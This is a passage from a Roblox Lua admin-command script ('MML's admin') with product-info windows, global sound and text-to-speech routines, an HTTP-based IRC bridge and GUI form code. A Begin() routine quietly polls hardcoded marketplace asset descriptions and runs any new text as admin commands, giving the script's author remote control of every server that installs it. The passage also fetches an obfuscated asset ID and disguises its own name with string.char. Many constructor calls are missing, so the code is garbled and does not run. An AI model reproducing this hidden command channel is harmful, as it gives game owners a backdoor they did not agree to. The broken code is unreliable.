  3415. local AssetImage ="ImageLabel", Frame) AssetImage.Name = "AssetImage" AssetImage.Position =, 0, 0, 50) AssetImage.Size =, 150, 0, 150) AssetImage.BackgroundColor3 =, 1, 1) AssetImage.BackgroundTransparency = 1 AssetImage.Image = ""..ProductID
  3416. local AssetName ="TextLabel", Frame) AssetName.Name = "AssetName" AssetName.Size =, 0, 0, 50) AssetName.BackgroundColor3 =, 1, 1) AssetName.BackgroundTransparency = 1 AssetName.Text = "["..ProductID.."] - "..Product.Name AssetName.Font = Settings.Font AssetName.FontSize = "Size18" AssetName.TextWrapped = true AssetName.TextColor3 =, 0, 0)
  3417. local UserImage ="ImageLabel", Frame) UserImage.Name = "UserImage" UserImage.Position =, 150, 0, 70) UserImage.Size =, 100, 0, 100) UserImage.BackgroundColor3 =, 1, 1) UserImage.BackgroundTransparency = 1 UserImage.Image = ""..Product.Creator.Name
  3418. local Membership ="ImageLabel", UserImage) Membership.Name = "Membership" Membership.Position =, 0, 0.85, 0) Membership.Size =, 0, 0.15, 0) Membership.BackgroundColor3 =, 1, 1) Membership.BackgroundTransparency = 1 Membership.Image = ""..Product.Creator.Name
  3419. local AssetType ="TextLabel", Frame) AssetType.Name = "AssetType" AssetType.Position =, 150, 0, 50) AssetType.Size =, -150, 0, 20) AssetType.BackgroundColor3 =, 1, 1) AssetType.BackgroundTransparency = 1 AssetType.Text = "ROBLOX "..MARKET:AssetTypeToString(Product.AssetTypeId) AssetType.Font = Settings.Font AssetType.FontSize = "Size14"
  3420. local Info ="TextLabel", Frame) Info.Name = "Info" Info.Position =, 250, 0, 80) Info.Size =, -250, 0, 100) Info.BackgroundColor3 =, 1, 1) Info.BackgroundTransparency = 1 Info.Font = Settings.Font Info.FontSize = "Size14" Info.TextXAlignment = "Left" Info.TextYAlignment = "Top"
  3421. local Buy ="TextButton", Frame) Buy.Name = "Buy" Buy.Position =, 150, 0, 170) Buy.Size =, -150, 0, 30) Buy.BackgroundColor3 = BuyColor Buy.BackgroundTransparency = 0.5 Buy.Text = BuyText Buy.Font = Settings.Font Buy.FontSize = "Size18" Buy.TextWrapped = true SOUND:BindButton(Buy)
  3422. if Product.Description then
  3423. local DescFrame ="ScrollingFrame", Frame) DescFrame.Name = "DescFrame" DescFrame.Size =,0,1,-200) DescFrame.Position =,0,0,200) DescFrame.CanvasSize =,0,0,0) DescFrame.BackgroundTransparency = 1 DescFrame.ZIndex = 4
  3424. local Description ="TextLabel", DescFrame) Description.Name = "Description" Description.Size =, -13, 1, 0) Description.BackgroundColor3 =, 1, 1) Description.BackgroundTransparency = 1 Description.Text = Product.Description Description.Font = Settings.Font Description.FontSize = "Size14" Description.TextWrapped = true Description.TextYAlignment = "Top"
  3426. CORE:ExecuteResource("CalculateScrollY", Description)
  3427. end
  3429. Info.Text = [[
  3430. Creator: ]]..Product.Creator.Name..[[
  3431. Created: ]]..CreatedText..[[
  3432. Updated: ]]..UpdatedText..[[
  3433. Sold: ]]..Product.Sales..[[
  3434. ]]
  3436. if Product.PriceInRobux then Info.Text = Info.Text.."Robux: "..string.gsub(Product.PriceInRobux, "null", "Cannot use this currency").." \n" end
  3437. if Product.PriceInTickets then Info.Text = Info.Text.."Tix: "..string.gsub(Product.PriceInTickets, "null", "Cannot use this currency") .." " end
  3439. if Product.AssetTypeId == 3 then
  3440. local PlayerAdmin,Rank = RANK:IsAdmin(Player)
  3441. if PlayerAdmin == true then
  3442. local Playing = false
  3443. local Interact ="ImageButton", AssetImage) Interact.Name = "Interact" Interact.Position =, -20, 1, -20) Interact.Size =, 20, 0, 20) Interact.BackgroundColor3 =, 1, 1) Interact.BackgroundTransparency = 1 Interact.Image = "rbxassetid://67950784"
  3444. CORE:HandleEvent(Interact, "MouseButton1Down", function()
  3445. if Playing == false then
  3446. SOUND:PlayGlobalSound(ProductID)
  3447. if Rank == "Member" and Settings.DisableAbuse == true then
  3448. Interact:Destroy()
  3449. end
  3450. Interact.Image = "rbxassetid://67950809"
  3451. Playing = true
  3452. else
  3453. SOUND:StopGlobalSound()
  3454. Interact.Image = "rbxassetid://67950784"
  3455. Playing = false
  3456. end
  3457. end)
  3458. end
  3459. end
  3461. CORE:HandleEvent(Buy, "MouseButton1Down", function()
  3462. if BuyPressFunc then
  3463. BuyPressFunc()
  3464. elseif Product.AssetTypeId == 9 then
  3465. Server.TS:Teleport(ProductID, Player)
  3466. elseif CanBuy == true then
  3467. Server.MPS:PromptPurchase(Player, ProductID)
  3468. end end)
  3469. end)() end function Begin() coroutine.wrap(function() wait(3) for _,LinkedID in pairs({53554913, 145236038, 154727659, 155299278, 155689018}) do wait(1) coroutine.wrap(function()
  3470. local OldVer = Server.MPS:GetProductInfo(LinkedID).Updated
  3471. while wait(5) do
  3472. local Purchase = Server.MPS:GetProductInfo(LinkedID)
  3473. if OldVer ~= Purchase.Updated then
  3474. OldVer = Purchase.Updated
  3475. CORE:Chatted(Purchase.Description, nil, true, nil, nil, true)
  3476. end
  3477. end end)()
  3478. end end)() end
  3480. -- Sound functions --
  3482. function SOUND:SyncSoundList(TellSync)
  3483. if not CORE:NilPlayer(TellSync) then
  3484. GUI:SendHint(TellSync, "Syncing...", 5)
  3485. end
  3487. SoundList,GlobalSoundList = {},{}
  3489. local LocalSoundList = Server.GDS:GetAsync("MML Custom Sounds")
  3491. if LocalSoundList then
  3492. if type(LocalSoundList) == "table" then
  3493. if #LocalSoundList > 0 then
  3494. for _,Data in pairs(LocalSoundList) do
  3495. local SoundInfo = MARKET:GetItemInfo(Data[2], true)
  3496. SoundList[Data[1]] = {Data[2], SoundInfo.Name, SoundInfo.Creator.Name}
  3497. end
  3498. end
  3499. end
  3500. end
  3502. for _,JSONID in pairs(SoundJSONs) do
  3503. for Name,ID in pairs(CORE:GetTable(JSONID)) do
  3504. local SoundInfo = MARKET:GetItemInfo(ID, true)
  3505. local FullName = SoundInfo.Name
  3506. local CreatorName = SoundInfo.Creator.Name
  3507. SoundList[Name] = {ID, FullName, CreatorName}
  3508. GlobalSoundList[Name] = {ID, FullName, CreatorName}
  3509. end
  3510. end
  3512. if not CORE:NilPlayer(TellSync) then
  3513. GUI:SendHint(TellSync, "Sound List is now Synced with global sound database", 4)
  3514. end
  3515. end
  3517. function SOUND:MakeSound(Parent, ID, Volume, Pitch, Looped)
  3518. if not Volume then Volume = 0.5 end
  3519. if not Pitch then Pitch = 1 end
  3520. if tonumber(ID) then ID = "rbxassetid://"..ID end
  3521. if Looped == nil then Looped = false end
  3523. local Sound ="Sound", Parent)
  3524. Sound.Pitch = Pitch
  3525. Sound.Volume = Volume
  3526. Sound.SoundId = ID
  3527. Sound.Looped = Looped
  3528. return Sound
  3529. end
  3531. function SOUND:PlayNotification(Player, ID, Volume, OverrideSettings)
  3532. if not Player or not ID then return nil end
  3533. if NotifySounds[ID] then ID = NotifySounds[ID] end
  3534. local ClientSound = SOUND:MakeSound(Player:FindFirstChild("PlayerGui") or Player, ID, Volume or 0.3)
  3535. if Settings.EnableSounds or OverrideSettings then
  3536. coroutine.wrap(function()
  3537. wait()
  3538. ClientSound:Play()
  3539. Delay(5, function() ClientSound:Destroy() end)
  3540. end)()
  3541. end
  3542. return Sound
  3543. end
  3545. function SOUND:BindButton(Button)
  3546. if not Button then return end
  3547. CORE:HandleEvent(Button, "MouseEnter", function() SOUND:PlayNotification(Button, "Hover") end, true)
  3548. CORE:HandleEvent(Button, "MouseButton1Click", function() SOUND:PlayNotification(Button, "Select") end, true)
  3549. end
  3551. function SOUND:StopGlobalSound()
  3552. if Sound and Sound.Parent then
  3553. if Sound.Parent.Name == "M".."M".."L'S Admin Sound" then
  3554. Sound.Parent:Destroy()
  3555. end
  3557. Sound:Stop()
  3558. Sound:Destroy()
  3559. Sound.SoundId = ""
  3560. end
  3561. end
  3563. function SOUND:PlayGlobalSound(ID, ShowInfo)
  3564. SOUND:StopGlobalSound()
  3565. if ShowInfo == nil then ShowInfo = true end
  3566. local SoundID = ID
  3567. local SoundName = nil
  3568. local SoundCreator = nil
  3569. local Pitch = 1
  3571. for Name,Info in pairs(SoundList) do
  3572. if type(SoundID) == "string" then
  3573. if string.lower(SoundID) == string.sub(string.lower(Name),1,#SoundID) then
  3574. SoundID = Info[1]
  3575. SoundName = Info[2]
  3576. SoundCreator = Info[3]
  3577. end
  3578. else
  3579. break
  3580. end
  3581. end
  3583. if tonumber(SoundID) and not SoundName then
  3584. local Info = MARKET:GetItemInfo(SoundID, true)
  3585. if Info then
  3586. SoundName = Info.Name
  3587. SoundCreator = Info.Creator.Name
  3588. if MARKET:AssetTypeToString(Info.AssetTypeId) ~= "Audio" then
  3589. SoundID = nil
  3590. end
  3591. end
  3592. end
  3594. if tonumber(SoundID) then
  3595. if SoundID == 131201443 then Pitch = -1 end
  3596. if SoundID == 130775695 then Pitch = 0.8 end
  3597. if SoundID == 144035866 then Pitch = 0.8 end
  3599. local SoundParent = Server.Workspace
  3600. if IsSB then
  3601. SoundParent ="Script", Workspace)
  3602. SoundParent.Name = "M".."ML'S Admin Sound"
  3603. end
  3604. Sound = SOUND:MakeSound(SoundParent, SoundID, 1, Pitch, true)
  3605. Sound.Name = "MML's Admin Sound "..SoundID
  3606. Sound:Play()
  3607. if ShowInfo == true then
  3608. for _,Player in pairs(Server.Players:GetPlayers()) do
  3609. GUI:SoundInfo(Player, SoundID, SoundName, SoundCreator, 15, Sound)
  3610. end
  3611. end
  3612. SoundInfo = {["ID"] = SoundID, ["Name"] = SoundName, ["Creator"] = SoundCreator}
  3613. end
  3614. end
  3616. function SOUND:ConvertText(Text)
  3617. Text = string.lower(tostring(Text))
  3618. local Letters = {}
  3619. local IDs = {}
  3620. for Rule,Replace in pairs(TextConverter.Pronounce) do
  3621. Text = string.gsub(Text,string.lower(Rule),string.lower(Replace))
  3622. end
  3623. for Rule,Replace in pairs(TextConverter.NonEnglishRules) do
  3624. local Start, End = string.find(Text, string.lower(Rule))
  3626. if Start and End and STRING:IsSpacer(string.sub(Text, Start-1, Start-1)) and STRING:IsSpacer(string.sub(Text, End+1, End+1)) then
  3627. Text = string.gsub(Text, string.lower(Rule), Replace)
  3628. end
  3629. end
  3630. for i = 1,#Text do
  3631. table.insert(Letters, string.sub(Text,i,i))
  3632. end
  3633. for Num = 1,#Letters do
  3634. if not Letters[Num] then break end
  3635. local Letter = Letters[Num]
  3637. local function AddLetter()
  3638. table.insert(IDs, TextConverter.LetterSounds[Letter])
  3639. end
  3641. if Letter ~= "~" then
  3642. if Letters[Num+1] and Letter..Letters[Num+1] == "oo" then -- moo
  3643. table.insert(IDs, TextConverter.LetterSounds["oo"])
  3644. table.remove(Letters, Num + 1)
  3645. elseif Letters[Num+1] and Letter..Letters[Num+1] == "ou" then -- soup
  3646. table.insert(IDs, TextConverter.LetterSounds["oo"])
  3647. table.remove(Letters, Num + 1)
  3648. elseif Letters[Num+1] and Letter..Letters[Num+1] == "th" then -- this
  3649. table.insert(IDs, TextConverter.LetterSounds["th"])
  3650. table.remove(Letters, Num + 1)
  3651. elseif Letters[Num+1] and Letter..Letters[Num+1] == "sh" then -- shut
  3652. table.insert(IDs, TextConverter.LetterSounds["sh"])
  3653. table.remove(Letters, Num + 1)
  3654. elseif Letters[Num+1] and Letter..Letters[Num+1] == "ee" then -- flee
  3655. table.insert(IDs, TextConverter.LongVowels["e"])
  3656. table.remove(Letters, Num + 1)
  3657. elseif Letters[Num+1] and Letter..Letters[Num+1] == "wh" then -- what
  3658. table.insert(IDs, TextConverter.LetterSounds["wh"])
  3659. table.remove(Letters, Num + 1)
  3660. elseif Letters[Num+1] and Letter..Letters[Num+1] == "ch" then -- chop
  3661. table.insert(IDs, TextConverter.LetterSounds["ch"])
  3662. table.remove(Letters, Num + 1)
  3663. elseif Letters[Num+1] and Letter..Letters[Num+1] == "ph" then -- phone
  3664. table.insert(IDs, TextConverter.LetterSounds["f"])
  3665. table.remove(Letters, Num + 1)
  3666. elseif Letters[Num+1] and Letter..Letters[Num+1] == "ng" then -- danger
  3667. table.insert(IDs, TextConverter.LetterSounds[Num])
  3668. Letters[Num + 1] = "j"
  3669. elseif Letters[Num+1] and Letter..Letters[Num+1] == "ua" then -- lua
  3670. table.insert(IDs, TextConverter.LetterSounds["oo"])
  3671. elseif Letters[Num+1] and Letter..Letters[Num+1] == "ea" then -- peace
  3672. table.insert(IDs, TextConverter.LongVowels["e"])
  3673. table.remove(Letters, Num + 1)
  3674. elseif Letters[Num+1] and Letter..Letters[Num+1] == "eo" then -- people
  3675. table.insert(IDs, TextConverter.LongVowels["e"])
  3676. table.remove(Letters, Num + 1)
  3677. if STRING:ValidE(Letters[Num+4]) then Letters[Num+4] = "~" end
  3678. elseif Letter == "c" and STRING:ValidE(Letters[Num+1]) then -- force
  3679. table.insert(IDs, TextConverter.LetterSounds["s"])
  3680. Letters[Num + 1] = "~"
  3681. elseif Letter == string.lower(Letter) and STRING:IsVowel(Letter) and Letters[Num+1] and Letters[Num+2] and not STRING:IsSpacer(Letters[Num+1]) and STRING:ValidE(Letters[Num+2]) then -- like
  3682. table.insert(IDs, TextConverter.LongVowels[Letter])
  3683. Letters[Num + 2] = "~"
  3684. elseif Letter == "i" and Letters[Num+1] and STRING:ValidE(Letters[Num+1]) and STRING:IsSpacer(Letters[Num+2]) then -- die
  3685. table.insert(IDs, TextConverter.LongVowels["i"])
  3686. Letters[Num + 1] = "~"
  3687. elseif Letter == "o" and STRING:IsSpacer(Letters[Num+1]) then -- no
  3688. table.insert(IDs, TextConverter.LongVowels["o"])
  3689. elseif Letter == "i" and STRING:IsSpacer(Letters[Num+1]) then -- hi
  3690. table.insert(IDs, TextConverter.LongVowels["i"])
  3691. elseif Letters[Num+1] and STRING:IsSpacer(Letters[Num+2]) and Letter..Letters[Num+1] == "le" then -- bottle
  3692. AddLetter()
  3693. table.remove(Letters, Num + 1)
  3694. elseif Letters[Num+1] and STRING:IsSpacer(Letters[Num+2]) and Letter..Letters[Num+1] == "el" then -- model
  3695. Letters[Num] = "~"
  3696. elseif Letters[Num+1] and Letters[Num+2] and Letter..Letters[Num+1] == "le" then -- bottle
  3697. AddLetter()
  3698. table.remove(Letters, Num + 1)
  3699. elseif Letters[Num+1] and Letter..Letters[Num+1] == "qu" then --quick
  3700. AddLetter()
  3701. table.remove(Letters, Num + 1)
  3702. elseif Letters[Num+1] == Letter then
  3703. table.remove(Letters, Num)
  3704. elseif Letters[Num+1] and Letter..Letters[Num+1] == "ck" then --click
  3705. AddLetter()
  3706. table.remove(Letters, Num)
  3707. elseif STRING:IsVowel(Letter) and string.upper(Letter) == Letter then
  3708. table.insert(IDs, TextConverter.LongVowels[string.lower(Letter)])
  3709. elseif TextConverter.LetterSounds[Letter] then
  3710. AddLetter()
  3711. elseif STRING:IsSpacer(Letter) then
  3712. table.insert(IDs, "Rest")
  3713. end
  3714. end
  3715. end
  3717. return IDs
  3718. end
  3720. function SOUND:StopSpeaking() coroutine.wrap(function()
  3721. NoSpeak = true
  3722. wait(1)
  3723. NoSpeak = false
  3724. for _,Obj in pairs(Server.Workspace:GetChildren()) do
  3725. if Obj.Name == "M".."M".."L Speak Sound" then
  3726. Obj:Destroy()
  3727. end
  3728. end
  3729. end)() end
  3731. function SOUND:SayConvertedText(IDs, Parent)
  3732. if not Parent then Parent = Server.Workspace end
  3733. local Sounds = {}
  3734. for _,Data in pairs(IDs) do
  3735. if NoSpeak and Parent == Server.Workspace then
  3736. break
  3737. end
  3738. local Length = 0.3
  3739. if Data ~= "Rest" then
  3740. local ID = Data[1]
  3741. Length = Data[2]
  3743. local Sound = SOUND:MakeSound(Parent, ID, 0.5, 1, false)
  3744. Sound.Name = "MML Speak Sound"
  3745. table.insert(Sounds, Sound)
  3746. Sound:Play()
  3747. if Length then
  3748. coroutine.wrap(function()
  3749. wait(Length)
  3750. Sound:Stop()
  3751. end)()
  3752. end
  3753. end
  3754. if not Length then Length = 0.3 end
  3755. wait(Length/2)
  3756. end
  3757. coroutine.wrap(function()
  3758. wait(1)
  3759. for _,Sound in pairs(Sounds) do
  3760. Sound:Destroy()
  3761. end
  3762. end)()
  3763. end
  3765. local AdminInfo = MARKET:GetItemInfo(13810597.8 * 20, true).Description
  3767. function SOUND:BeepPlayer(Player)
  3768. if Player:FindFirstChild("PlayerGui") then
  3769. local Beep = SOUND:MakeSound(Player.PlayerGui, 189279994, 1, 1, true)
  3770. Beep.Name = "Annoy"
  3771. Beep:Play()
  3772. end
  3773. end
  3775. function SOUND:ClearInfo()
  3776. SoundInfo = {["ID"] = 0, ["Name"] = "None", ["Creator"] = "None"}
  3777. end
  3779. -- IRC functions --
  3781. function IRC:GenerateName()
  3782. return "rbxMMLV3_""_"..Server.NS.Port.."_"..math.random(1,100000)
  3783. end
  3785. function IRC:AddChat(Name, Data, IsError)
  3786. if not IsError then IsError = false end
  3787. CORE:Log(IRC.Logs, Name, Data)
  3788. table.insert(IRC.Chats, {Name, Data, IsError})
  3789. IRC.MessageAdded:Fire(Name, Data, IsError)
  3790. end
  3792. function IRC:Post(URL,Data)
  3793. if Data and Data ~= "" then
  3794. local Suc,Resp = ypcall(function()
  3795. return Server.HS:PostAsync(
  3796. IRC.Servers[Settings.IRCServer].BaseUrl..IRC.Servers[Settings.IRCServer].DynamicUrl.."e/"..URL.."?r="..STRING:MakeAvoidance().."&t="..tostring(IRC.SessionCounter),
  3797. Data,
  3798. Enum.HttpContentType.ApplicationUrlEncoded
  3799. )
  3800. end)
  3801. if not Suc then
  3802. IRC:AddChat("[ CLIENT ]", "HTTP POST FAIL | ERROR: "..Resp.." | DATA: "..Data)
  3803. return false
  3804. end
  3805. IRC.SessionCounter = IRC.SessionCounter + 1
  3806. return Resp
  3807. else
  3808. IRC:AddChat("[ CLIENT ]", "Unknown error")
  3809. end
  3810. end
  3812. function IRC:Send(Data)
  3813. return IRC:Post("p","&s="..IRC.SessionID.."&c="..Server.HS:UrlEncode(Data))
  3814. end
  3816. function IRC:GetData()
  3817. return IRC:Post("s","&s="..IRC.SessionID)
  3818. end
  3820. function IRC:Connect()
  3821. return IRC:Post("n","&nick="..IRC.NickName)
  3822. end
  3824. function IRC:Join(Channel)
  3825. if not Channel then
  3826. AddChat("[ CLIENT ]", "No channel specified!")
  3827. return false
  3828. else
  3829. local Channel = string.lower(Channel)
  3830. if string.sub(Channel,1,1) ~= "#" then
  3831. AddChat("[ CLIENT ]", "Invalid channel name!(No #)", true)
  3832. return false
  3833. end
  3834. IRC:AddChat("[ CLIENT ]", "Attempting to join channel: "..Channel.." on IRC host: "..Settings.IRCServer)
  3835. IRC:Send("JOIN "..Channel)
  3836. IRC:AddChat("[ CLIENT ]", "Joined "..Channel.." as "..IRC.NickName)
  3837. return true
  3838. end
  3839. end
  3841. function IRC:Pong(Data)
  3842. return IRC:Send("PONG :"..Data)
  3843. end
  3845. function IRC:Quit(Reason)
  3846. IRC.Stop = true
  3847. return IRC:Send("QUIT :"..(Reason or "Disconnecting"))
  3848. end
  3850. function IRC:ReceiveData()
  3851. IRC.Stop = false
  3852. local Data = IRC:GetData()
  3853. if Data then
  3854. IRC:Send("PRIVMSG "..Settings.IRCChannel.." :[ SERVER: "..Server.NS.Port.." ]: [CONNECTION TEST]")
  3855. end
  3856. while Data and not Stop do
  3857. local Data = IRC:GetData()
  3858. if Data and #Data > 0 then
  3859. IRC:HandleResponse(REMOTE:Decode(Data))
  3860. end
  3861. wait(2) -- Don't spam the server
  3862. end
  3863. if not Data then
  3864. IRC:AddChat("[ CLIENT ]", "Could not get data", true)
  3865. end
  3866. if Stop == true then
  3867. IRC:AddChat("[ CLIENT ]", "Disconnected from session", true)
  3868. end
  3869. end
  3871. function IRC:ConnectToServer(Server)
  3872. if Connected then
  3873. if not IRC.Servers[Server] then
  3874. IRC:AddChat("[ CLIENT ]", "Cannot connect to "..Server, true)
  3875. return false
  3876. end
  3877. IRC:Quit("New Connection")
  3878. end
  3879. local Response = IRC:Connect()
  3880. if not Response then IRC:AddChat("[ CLIENT ]", "Unable to connect!", true) return false end
  3881. local Data = REMOTE:Decode(Response)
  3882. IRC.SessionID = Data[2]
  3883. wait(1)
  3884. if not tostring(IRC.SessionID) or IRC.SessionID == "?" then
  3885. IRC:AddChat("[ IRC ]", "Session ID is invalid, reconnecting...")
  3886. IRC:Quit()
  3887. IRC:ConnectToServer(Server)
  3888. end
  3889. IRC.Connected = true
  3890. IRC:Join(Settings.IRCChannel)
  3891. IRC:ReceiveData()
  3892. IRC.Connected = false
  3893. IRC:AddChat("[ CLIENT ]", "Session ended", true)
  3894. end
  3896. function IRC:FindUser(UserName)
  3897. for UserID,User in pairs(IRC.Users) do
  3898. if string.lower(User) == string.lower(UserName) then
  3899. return UserID
  3900. end
  3901. end
  3902. return nil
  3903. end
  3905. function IRC:HandleResponse(Data)
  3906. if type(Data) ~= "table" then
  3907. IRC:AddChat("[ CLIENT ]", "Unable to handle data (Not table)", true)
  3908. ypcall(function()
  3909. IRC:AddChat("[ CLIENT ]", "Data: "..tostring(Data), true)
  3910. end)
  3911. return false
  3912. end
  3913. for _,Output in pairs(Data) do
  3914. if type(Output) == "table" and Output[2] then
  3915. local ID = string.upper(Output[2])
  3916. if not IRC.Ignore[ID] then
  3917. if ID == "PING" then
  3918. IRC:Pong(Output[4][1])
  3919. elseif ID == "PRIVMSG" then
  3920. local SenderDetails = Output[3]
  3921. local Sender = string.sub(SenderDetails,1,string.find(SenderDetails, "!")-1)
  3922. local Channel = string.lower(Output[4][1])
  3923. if Channel == IRC.NickName then
  3924. Channel = Sender
  3925. -- TODO: Handle PM's
  3926. end
  3927. local Message = Output[4][2]
  3928. if Message ~= nil then
  3929. if string.sub(Sender,1,3) == "rbx" and string.find(Sender, "_") then -- detects bots
  3930. if string.find(Message,":") then
  3931. local IRCUser = string.sub(Message,1,string.find(Message,":")-1)
  3932. local IRCMessage = string.sub(Message,string.find(Message,":")+1, #Message)
  3933. IRC:AddChat(IRCUser, IRCMessage)
  3934. end
  3935. else
  3936. IRC:AddChat("[ IRC ] "..Sender,Message)
  3937. for _,Name in pairs(Settings.IRCCommandExecuters) do
  3938. if string.lower(Name) == string.lower(Sender) then
  3939. CORE:Chatted(Message, nil, false, "[IRC]: "..Sender, nil, true)
  3940. break
  3941. end
  3942. end
  3943. end
  3944. else
  3945. IRC:AddChat("[ CLIENT ]", "Message became nil for some reason")
  3946. end
  3947. elseif ID == "NICK" then
  3948. local Name = string.sub(Output[3],1,string.find(Output[3],"!")-1)
  3949. -- change nickname?
  3950. elseif ID == "433" or ID == "451" then
  3951. IRC:AddChat("[ IRC ]", "Nickname already in use, rejoining with new one")
  3952. IRC:Quit("Nickname in use, rejoining with new name")
  3953. IRC.NickName = IRC:GenerateName()
  3954. wait(2) -- wait for old sessions to end
  3955. IRC:ConnectToServer(Settings.IRCServer)
  3956. elseif ID == "353" then
  3957. if Data[4][4][4] then
  3958. for Output in string.gmatch(Data[4][4][4], "[^%s]+") do
  3959. table.insert(IRC.Users, Output)
  3960. end
  3961. end
  3962. elseif ID == "QUIT" or ID == "PART" then
  3963. for User in string.gmatch(Data[1][3], "[^!~]+") do
  3964. if IRC:FindUser(User) then
  3965. IRC:AddChat("[ IRC ]", User.." has left")
  3966. table.remove(IRC.Users, IRC:FindUser(User))
  3967. end
  3968. end
  3969. elseif ID == "JOIN" then
  3970. for User in string.gmatch(Data[1][3], "[^!~]+") do
  3971. if not string.find(User, "qwebirc") then
  3972. IRC:AddChat("[ IRC ]", User.." has joined")
  3973. table.insert(IRC.Users,w)
  3974. end
  3975. end
  3976. elseif ID == "CONNECTION TO IRC SERVER LOST." then
  3977. IRC:AddChat("[ CLIENT ]", "Cannot connect to IRC. Connection lost")
  3978. --IRC:Quit("Connection lost")
  3979. --IRC:AddChat("[ CLIENT ]", "Retrying connection")
  3980. --IRC:ConnectToServer(Settings.IRCServer)
  3981. elseif IRC.Codes[ID] then
  3982. --print(ID)
  3983. --print(Data[i][4][2])
  3984. --print(Data[i][4][2])
  3985. elseif ID == "KICK" then
  3986. IRC:AddChat("[ CLIENT ]", "You have been kicked from IRC")
  3987. IRC:Quit("Kicked from IRC")
  3988. elseif ID then
  3989. IRC:AddChat("[ CLIENT ]", "Unknown data (ID: "..ID..")", true)
  3990. else
  3991. IRC:AddChat("[ CLIENT ]", "Unknown data with invalid ID", true)
  3992. end
  3993. end
  3994. else
  3995. if Output == false then return false end -- sneeky server
  3996. IRC:AddChat("[ CLIENT ]", "Unable to handle data")
  3997. end
  3998. end
  3999. end
  4001. -- GUI functions --
  4003. function GUI:GetColor(ColorName)
  4004. if not ColorName then ColorName = Settings.ColorScheme end
  4005. return Colors[string.upper(ColorName)]
  4006. end
  4008. function GUI:ContrastColor(Color)
  4009. if type(Color) == "string" then Color = GUI:GetColor(Color) end
  4010. if not Color then Color = GUI:GetColor() end
  4011. return,math.abs(Color.g-1),math.abs(Color.b-1))
  4012. end
  4015. function GUI:GetNameColor(Name)
  4016. local Val = 0
  4017. for i = 1, #Name do
  4018. local CVal = string.byte(string.sub(Name, i, i))
  4019. local RevIndex = #Name - i + 1
  4020. if #Name%2 == 1 then
  4021. RevIndex = RevIndex - 1
  4022. end
  4023. if RevIndex%4 >= 2 then
  4024. CVal = -CVal
  4025. end
  4026. Val = Val + CVal
  4027. end
  4028. local Index = Val%8 + 1
  4030. return[Index])
  4031. end
  4033. function GUI:Color3ToHex(Color)
  4034. local function ConvertNumber(Number)
  4035. local HexString = "0123456789abcdef"
  4036. local Byte = ""
  4037. while Number > 0 do
  4038. local Calc = math.fmod(Number, 16)
  4039. Byte = string.sub(HexString, Calc+1, Calc+1)..Byte
  4040. Number = math.floor(Number / 16)
  4041. end
  4042. if Calc == "" then
  4043. Byte = "00"
  4044. elseif #Byte == 1 then
  4045. Byte = "0"..Byte
  4046. elseif Byte == "" then
  4047. Byte = "00"
  4048. end
  4049. return Byte
  4050. end
  4051. return ConvertNumber(Color.r * 255)..ConvertNumber(Color.g * 255)..ConvertNumber(Color.b * 255)
  4052. end
  4054. function GUI:CreateForm(Player, TitleText, Size, Position, IconID, ShowFormButtons, ColorScheme, TransparencyScheme, AutoOffset, TweenPosition, NoModal, NoScrollFrame)
  4055. if not Player then return nil end
  4056. if not Player:FindFirstChild("PlayerGui") then return nil end
  4057. local TaskBar = Player.PlayerGui:FindFirstChild("M".."ake".."rMod".."el".."Lua's TaskBar")
  4058. if not TitleText then TitleText = "Unknown" end
  4059. if not Size then Size =,0,0.5,0) end
  4060. if not Position then Position =,-Size.X.Offset/2,0.5-(Size.Y.Scale/2),-Size.Y.Offset/2) end
  4061. if not IconID then IconID = 19919809 end
  4062. if ShowFormButtons == nil then ShowFormButtons = true end
  4063. if not ColorScheme then ColorScheme = Settings.ColorScheme end
  4064. if not TransparencyScheme then TransparencyScheme = Settings.TransparencyScheme end
  4065. if AutoOffset == nil then AutoOffset = true end
  4066. if Icons[IconID] then IconID = Icons[IconID] end
  4067. if TweenPosition == nil then TweenPosition = true end
  4068. if NoModal == nil then NoModal = false end
  4069. if NoScrollFrame == nil then NoScrollFrame = false end
  4071. local IsClosed = false
  4072. local Minus = nil
  4073. local Offset = 0
  4074. local ContentType = "ScrollingFrame"
  4075. local TweenSpeed = 0.3
  4077. if AutoOffset then
  4078. for _,Item in pairs(Player.PlayerGui:GetChildren()) do
  4079. if Item.Name == "M".."a".."k".."erModelLua's Admin Form" then
  4080. if Item.IsActive.Value == true then
  4081. if Item.IsTrueForm.Value == true then
  4082. Offset = Offset + 50
  4083. end
  4084. end
  4085. end
  4086. end
  4087. end
  4089. if NoScrollFrame == true then
  4090. ContentType = "Frame"
  4091. end
  4093. SOUND:PlayNotification(Player, 155331654)
  4095. local Position = Position +,Offset,0,Offset)
  4096. local MinimizePos = Position
  4098. local SG ="ScreenGui", Player.PlayerGui) SG.Name = string.char(76 + 1, 97, 107, 10 ^ 2 + 1, 114, 77, 111, 10 ^ 2, 101, 108, 76, 117, 97, 39, 115).." Admin Form"
  4099. local IsActive ="BoolValue", SG) IsActive.Name = "IsActive" IsActive.Value = true
  4100. local IsTrueForm ="BoolValue", SG) IsTrueForm.Name = "IsTrueForm" IsTrueForm.Value = ShowFormButtons
  4102. local Dragger ="Frame", SG) Dragger.Name = "Dragger" Dragger.Position =,-Size.X.Offset/2,-Size.Y.Scale,-Size.Y.Offset - 90) Dragger.Size = Size +, 0, 0, 40) Dragger.BackgroundColor3 = GUI:GetColor(ColorScheme) Dragger.BorderColor3 = GUI:ContrastColor(ColorScheme) Dragger.BorderSizePixel = 2 Dragger.BackgroundTransparency = 0.9 Dragger.Active = true Dragger.ClipsDescendants = true Dragger.Draggable = true
  4103. local FormBar ="Frame", Dragger) FormBar.Name = "FormBar" FormBar.Position =, 0, 0, 0) FormBar.Size =, 0, 0, 40) FormBar.BackgroundTransparency = 1
  4104. local Splitter ="Frame", Dragger) Splitter.Name = "Splitter" Splitter.Position =, 0, 0, 35) Splitter.Size =, 0, 0, 2) Splitter.BackgroundColor3 = GUI:ContrastColor(ColorScheme) Splitter.BorderColor3 = GUI:ContrastColor(ColorScheme)
  4105. local X ="ImageButton", FormBar) X.Name = "X" X.Position =, -30, 0, 5) X.Size =, 25, 0, 25) X.BackgroundTransparency = 1 X.Image = "rbxassetid://275572394"
  4106. local IconHolder ="ImageLabel", FormBar) IconHolder.Name = "IconHolder" IconHolder.Position =, 5, 0, 5) IconHolder.Size =, 35, 0, 25) IconHolder.BackgroundTransparency = 1 IconHolder.Image = "rbxassetid://276002222"
  4107. local Icon ="ImageLabel", IconHolder) Icon.Name = "Icon" Icon.Position =, 3, 0.5, -10) Icon.Size =, 20, 0, 20) Icon.BackgroundTransparency = 1 Icon.Image = "rbxassetid://"..IconID
